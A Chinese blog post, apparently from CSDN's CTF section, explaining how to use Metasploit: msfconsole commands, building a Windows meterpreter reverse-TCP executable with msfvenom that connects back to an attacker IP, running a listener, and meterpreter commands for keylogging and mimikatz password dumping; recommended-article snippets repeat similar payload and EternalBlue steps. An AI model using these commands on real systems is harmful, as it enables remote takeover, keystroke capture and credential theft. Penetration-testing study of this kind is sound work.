MSF使用说明

最新推荐文章于 2023-11-26 10:03:14 发布
最新推荐文章于 2023-11-26 10:03:14 发布
阅读量338 收藏 4
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dakhda/article/details/132157974
版权

在这里插入图片描述

一、什么是MSF

MSF是metasploit framework 的简称,是一个在全球使用十分广泛的渗透框架。
MSF中有以下模块,分别为:
exploits
auxiliary
post
payload
excoders
nops
evasion
在这里插入图片描述

二、MSF的使用

1、启动SQL服务

service postgresql start
或者:systemctl start postgresql

2、初始化数据库服务

msfdb init

3、进入msf界面

msfconsole

4、查看数据库服务是否正常

db_status

5、msf常用命令

use 攻击模块
show payloads
set payloads
set target
show options
set rhosts
set rports
exploit
search

三、payload的生成:msfvenom

msfvenom -l payloads #查看msfvenom中所有的payload
msfvenom --list formats  #查看支持的后缀名的格式

生成连接马:

msfvenom -p 指定要使用的payload lhost=回连攻击机ip地址 lport=回连攻击机的端口 -f 指定要输出的payload格式 > 输出的文件路径+文件名
---------
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP地址> LPORT=<连接的端口号> -f exe >name.exe

本地设置监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2<本机ip地址>
set lport 3344<本机指定端口>
exploit

成功反弹shell…

四、meterpreter的使用

常用命令:
backgrouond  #将meterpreter会话终端隐藏在后台
sessions   #查看已经成功获取的会话,使用sessions -l
quit      #直接关闭当前的meterpreter会话终端
shell 		#获取系统的控制台shell
ps  		#查看目标主机运行的进程信息
migrate 	#将meterpreter会话从一个进程迁移到另一个进程
execute		#可在目标机器执行文件
getpid 		#获取当前会话所在进程的pid值
kill 进程号		#杀死指定进程号
getuid      #获取运行meterpreter会话的用户名,了解当前权限

键盘记录:
keyscan_start
keyscan_dump
keyscan_stop		#键盘记录

mimikatz模块:
load mimikatz	#加载mimikatz

msc				#获取hash值

kerberos		#获取明文密码

wdigest			#获取系统账户信息

mimikatz_command -f sekurlsa::searchPassword
30岁学java的貧曾
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF使用详解
m0_52051132的博客
10-19 7933
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
zzz6583zz的博客
06-15 948
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
msf使用
赵花花08042的博客
05-25 1080
msf 云服务器输入msfconsole,进入msf search 查找需要模块 use 该模块 show options查看需要配置内容 命令行输入 connect www.baidu.com 80 连接百度的80端口 back退出,返回400 应该表示是通的 jobs 显示和管理作业 kill 进程 loadpath 加载模块的路径 load 加载插件 route 查看会话路由信息 系统漏洞利用过程 ~ ms08067 10. 天镜,nessuss,极光扫描器进行漏扫 11. 根据漏扫结果,去
MSF使用小技巧
永远是少年
06-08 4228
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF使用小技巧。 一、MSF命令行开启 二、MSF退出 三、MSF 数据库导入和导出 四、MSF会话设置
【工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 10万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2334
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
3、MSF使用
qq_55202378的博客
11-26 161
攻破了系统,需要与靶机进行通信,以便操纵靶机,一般用反弹shell,这个反弹shell的代码就是。分别输入以下命令,使用。溢出攻击成功后,返回。
MSF使用流程
sulongniao3的博客
10-19 241
1、天镜、nessus、极光扫描器进行漏洞扫描,跟据漏扫结果去msf里面进行查找漏洞利用工具 2、打开msf 通过search搜漏洞编号或漏洞名称 3、搜到漏洞之后,用use 打开msf漏洞利用工具 4、输入info查看工具相关说明 5、用show options 查看工具使用方法 6、配置受害者ip set rhosts /set rport set payload 7、攻击run 或者exploit ...
MSF evasion模块的使用
永远是少年
06-10 546
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF evasion模块的使用。 一、木马文件生成 二、SHELL反弹检验
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 906
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
变频器说明书大全系列-MSF.rar
04-30
变频器说明书大全系列-MSF.rar 是一个包含详细变频器使用指南的压缩文件,主要文件为 MSF.pdf。这个资源对于理解和操作MSF系列变频器的用户来说是极其宝贵的。变频器是一种电力控制设备,它能改变电机运行速度,广泛...
变频器说明书系列-MSF.pdf
04-30
变频器说明书系列-MSF.pdf
依尔通(Emotron)变频器MSF说明书.rar
10-10
通过详读《依尔通(Emotron)变频器MSF说明书》,用户可以掌握变频器的使用方法,优化设备运行,提高生产效率,同时降低故障率和维护成本。在实际应用中,应严格按照说明书指导操作,确保设备的长期稳定运行。
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
01-24
同时由于MSF原始代码非常的不优美简洁,所以我特地将MSF源码作为一个“库”来使用,而将我们可以扩展和开发的部分单独提取出来开发成MSF_developed,这样对代码理解和使用会有更好的帮助。需要提前说明的是,由于...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于SpringCloud微服务架构的B2C电子商务系统-可执行内含文档代码-可执行内含文档代码.zip
07-28
基于SpringCloud微服务架构的B2C电子商务系统-可执行内含文档代码-可执行内含文档代码.zip
智慧校园整体解决方案-6PPT(102页).pptx
最新发布
07-28
智慧校园整体解决方案是响应国家教育信息化政策,结合教育改革和技术创新的产物。该方案以物联网、大数据、人工智能和移动互联技术为基础,旨在打造一个安全、高效、互动且环保的教育环境。方案强调从数字化校园向智慧校园的转变,通过自动数据采集、智能分析和按需服务,实现校园业务的智能化管理。 方案的总体设计原则包括应用至上、分层设计和互联互通,确保系统能够满足不同用户角色的需求,并实现数据和资源的整合与共享。框架设计涵盖了校园安全、管理、教学、环境等多个方面,构建了一个全面的校园应用生态系统。这包括智慧安全系统、校园身份识别、智能排课及选课系统、智慧学习系统、精品录播教室方案等,以支持个性化学习和教学评估。 建设内容突出了智慧安全和智慧管理的重要性。智慧安全管理通过分布式录播系统和紧急预案一键启动功能,增强校园安全预警和事件响应能力。智慧管理系统则利用物联网技术,实现人员和设备的智能管理,提高校园运营效率。 智慧教学部分,方案提供了智慧学习系统和精品录播教室方案,支持专业级学习硬件和智能化网络管理,促进个性化学习和教学资源的高效利用。同时,教学质量评估中心和资源应用平台的建设,旨在提升教学评估的科学性和教育资源的共享性。 智慧环境建设则侧重于基于物联网的设备管理,通过智慧教室管理系统实现教室环境的智能控制和能效管理,打造绿色、节能的校园环境。电子班牌和校园信息发布系统的建设,将作为智慧校园的核心和入口,提供教务、一卡通、图书馆等系统的集成信息。 总体而言,智慧校园整体解决方案通过集成先进技术,不仅提升了校园的信息化水平,而且优化了教学和管理流程,为学生、教师和家长提供了更加便捷、个性化的教育体验。
kali 的msf怎么使用
03-31
Msf是Metasploit Framework的缩写,是一款开源的网络安全渗透测试工具。在Kali Linux中,Msf已经预装好了,可以通过以下步骤启动Msf: 1. 打开终端,输入命令“msfconsole”进入Msf控制台。 2. 在控制台中输入“help”命令,查看支持的模块和指令。 3. 使用“search”命令搜索可用的模块,例如“search ftp”可以搜索所有关于FTP漏洞的模块。 4. 使用“use”命令选择一个模块,例如“use exploit/windows/smb/ms17_010_eternalblue”。 5. 根据模块的要求设置参数,例如“set RHOST 192.168.1.100”设置目标主机的IP地址。 6. 执行攻击,例如“exploit”命令。 7. 如果攻击成功,可以使用“sessions”命令查看会话列表,并使用“sessions -i <会话编号>”命令进入一个会话。 8. 在会话中,可以使用各种命令执行攻击、获取信息等操作。例如“shell”命令可以获取目标主机的shell权限,然后执行各种命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值